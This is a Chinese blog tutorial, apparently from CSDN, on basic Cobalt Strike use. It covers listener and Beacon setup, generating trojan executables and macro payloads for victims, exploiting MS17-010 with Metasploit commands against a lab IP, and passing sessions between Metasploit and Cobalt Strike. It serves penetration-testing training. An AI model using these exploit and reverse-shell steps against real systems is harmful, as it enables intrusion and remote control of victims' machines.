CobaltStrike基础使用

Cobalt Strike

简介

Cobalt Strike 分为客户端组件和服务器组件,服务器的组件也是团队服务器,可以放在 局域网或者公网下进行团队使用,也是 Cobalt Strike 社会工程功能的托管机器,团队服务器 还可以存储由 Cobalt Strike 收集的数据,并且进行日志管理 Cobalt Strike 服务器必须在 Linux 系统上运行,这里演示服务器在 Linux KALI 端,本地进行 Cobalt Strike 客户端的连接。
在这里插入图片描述CobaltStrike 集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe 木 马生成,windows dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑。钓鱼攻击 包。

CS的使用

启动 CS 服务端
在这里插入图片描述在这里插入图片描述启动客户端 服务端启动后客户端启动进行连接(团队多人连接将用户名设置为自己的用来区分团队成员)
在这里插入图片描述主界面
在这里插入图片描述

功能使用(主机上线)

1.设置监听器用来接收会话
在这里插入图片描述name:监听器名字
payload:payload 类型
Host: shell 反弹的主机,
kali IP Port: 反弹端口
在这里插入图片描述

这里 Payload 有 9 种选项,如下
内部的 Listener 
windows/beacon_dns/reverse_dns_txt 
windows/beacon_dns/reverse_http 
windows/beacon_http/reverse_http
windows/beacon_https/reverse_https windows/beacon_smb/bind_pipe 

外部的 Listener 
windows/foreign/reverse_dns_txt
windows/foreign/reverse_http 
windows/foreign/reverse_https 
windows/foreign/reverse_tcp

Beacon 为内置的监听器,在目标主机执行相应的 payload,获取 shell 到 cs 上;其中包含 DNS、 HTTP、HTTPS 等,Beacon 可以选择通过 DNS 还是 HTTP/S 协议出口网络,甚至可以在使用 Beacon 通讯过程中切换 HTTP 和 DNS。其支持多主机连接,部署好 Beacon 后提交一个要连 回的域名或主机的列表,Beacon 将通过这些主机轮询。目标网络的防护团队必须拦截所有 的列表中的主机才可中断和其网络的通讯。通过种种方式获取 shell 以后(比如直接运行生 成的 exe),就可以使用 Beacon 了。

Foreign 为外部结合的 Listener,经常用于 MSF 的结合,例如获取meterpreter 到 MSF 上

2.生成木马

HTML Application 生成恶意的 HTA 木马文件; 
MS Office Macro 生成 office 宏病毒文件; 
Payload Generator 生成各种语言版本的 payload; 
Windows Executable 生成可执行 exe 木马; 
Windows Executable(S) 生成无状态的可执行 exe 木马

在这里插入图片描述在这里插入图片描述这是生成 exe 文件,还可以生成宏病毒等上面介绍到的
生成后会保存到指定地方,通过某种方式上传到对方机器上,可以通过 Webshell 方式等这 里不在讲解了 受害者运行 exe 文件我们的 CS 就直接上线了
在这里插入图片描述
发送给用户,用户双击我们的cs上就成功上线了主机
在这里插入图片描述3.正常我们进去需要调整响应的时间,sleep 3 就行。
在这里插入图片描述
可以对我们上线的机器进行以下操作,也可以联动 MSF 进行使用

联动 MSF 使用

将 MSF 的会话转发到 CS 上
通过漏洞复现演示 MSF 获取目标 Session
KALI:192.168.50.218
CS:192.168.50.130
受害者 IP:192.168.50.185

1.发现漏洞

  • Nmap -A 扫描目标开放了 445 端口

在这里插入图片描述

通过使用 MSF 辅助模块扫描发现存在 ms17_010 漏洞 
use auxiliary/scanner/smb/smb_ms17_010 
set rhosts 192.168.50.185 
exploit

在这里插入图片描述2. 查找漏洞利用模块
在这里插入图片描述

漏洞利用 
use exploit/windows/smb/ms17_010_eternalblue 
set payload windows/x64/meterpreter/reverse_tcp 
set RHOST 192.168.50.185 
Run

在这里插入图片描述获取后 我们 background 获取 session
在这里插入图片描述
与 CS 联动,将会话转发到 CS 中
CS 配置新建一个监听
在这里插入图片描述

KALI 中配置 
use exploit/windows/local/payload_inject 
set payload windows/meterpreter/reverse_http 
set DisablePayloadHandler true 
set lhost 192.168.50.218 //KALI IP 
set lport 4443 与 CS 同端口 
set session 1

在这里插入图片描述CS 这边就接收到了 MSF 的会话
在这里插入图片描述

CS 的会话转发到 MSF 中

由于生成的木马就是 HTTP 的,所以委派给 msf 时,监听器还是 HTTP 的 CS 添加一个监听器
在这里插入图片描述

MSF 准备 
Use exploit/multi/handler 
Set payload windows/meterpreter/reverse_http 
Set lhost ip 
Set lport ip

在这里插入图片描述设置完成后我们就可以使用 CS 进行委派会话了
在这里插入图片描述选中我们刚刚创建的就行
在这里插入图片描述这样我们的 MSF 端就会获取到这个会话 CS 还有非常多的功能,大家慢慢发现!

请添加图片描述

  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值